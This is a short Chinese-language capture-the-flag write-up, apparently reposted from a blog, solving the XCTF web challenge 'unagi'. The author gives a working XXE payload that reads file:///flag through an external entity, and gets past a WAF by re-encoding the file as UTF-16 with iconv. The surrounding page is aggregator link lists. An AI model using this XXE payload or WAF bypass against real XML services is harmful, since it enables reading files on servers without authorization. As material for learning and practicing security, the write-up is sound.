XCTF Web 记录（unagi）

其他 2021-03-20 03:56:59 阅读次数: 0

unagi

打开页面，四个跳转。

一个提示页面：
在这里插入图片描述
一个利用方式提示：

一个利用点：

利用方式：

XXE注入。

构造XXE注入代码：

<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>bob</username>
        <password>passwd2</password>
        <name> Bob</name>
        <email>[email protected]</email>  
        <group>CSAW2019</group>
        <intro>&xxe;</intro>
    </user>
</users>

上传后发现存在WAF：
在这里插入图片描述
通过XXE编码转换成utf-16编码绕过：

iconv -f utf8 -t utf-16 1.xml>2.xml

上传，获得flag。

总结

第一次做XXE的题目。

XXE模板中，使用file://读取文件。

iconv转换编码。

猜你喜欢

转载自blog.csdn.net/qq_45742511/article/details/114575680

XCTF Web 记录（unagi）

XCTF Web 记录（bug）

XCTF Web 记录（FlatScience）

XCTF Web 记录（ics-07）

XCTF Web 记录（第三天）

XCTF Web 记录（第二天）

XCTF Web msf

XCTF-web2

XCTF web2

xctf-web supersqli

xctf_Baby_web

XCTF攻防世界Web

xctf闯关记录

XCTF Web upload（RCTF 2015）

XCTF Web_php_unserialize

2020.4.6 xctf(web2)①

2020.3.27 xctf（baby_web）①

XCTF-web_php_unserialize

XCTF Web_php_include

XCTF web新手 backup

XCTF web新手 robots

XCTF web新手 cookie

xctf_Web_php_include

XCTF Web 记录（第一天）【记录到理解不了为止】

XCTF Web 记录（第四天、第五天）

XCTF-WEB-Web_php_include

xctf菜鸟刷misc记录

Xctf

XCTF攻防世界Web之WriteUp

XCTF新手区Web解题Writeup

今日推荐

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」

开源日报 | 谷歌扶持鸿蒙上位；开源Rabbit R1；Docker加持的安卓手机；微软的焦虑和野心；海尔电器把开放平台关了

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

周排行

Java自定义时间格式

同步整形电路

在开发中最最最常用的字符串的属性大集合

Linux 查看端口占用并杀掉

Java基础四：ArrayList

多线程之死锁就是这么简单

mysql 基础命令集

awk 命令详解

Centos6.3编译安装nginx+php步骤

OCR （Optical Character Recognition，光学字符识别）

每日归档

更多

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)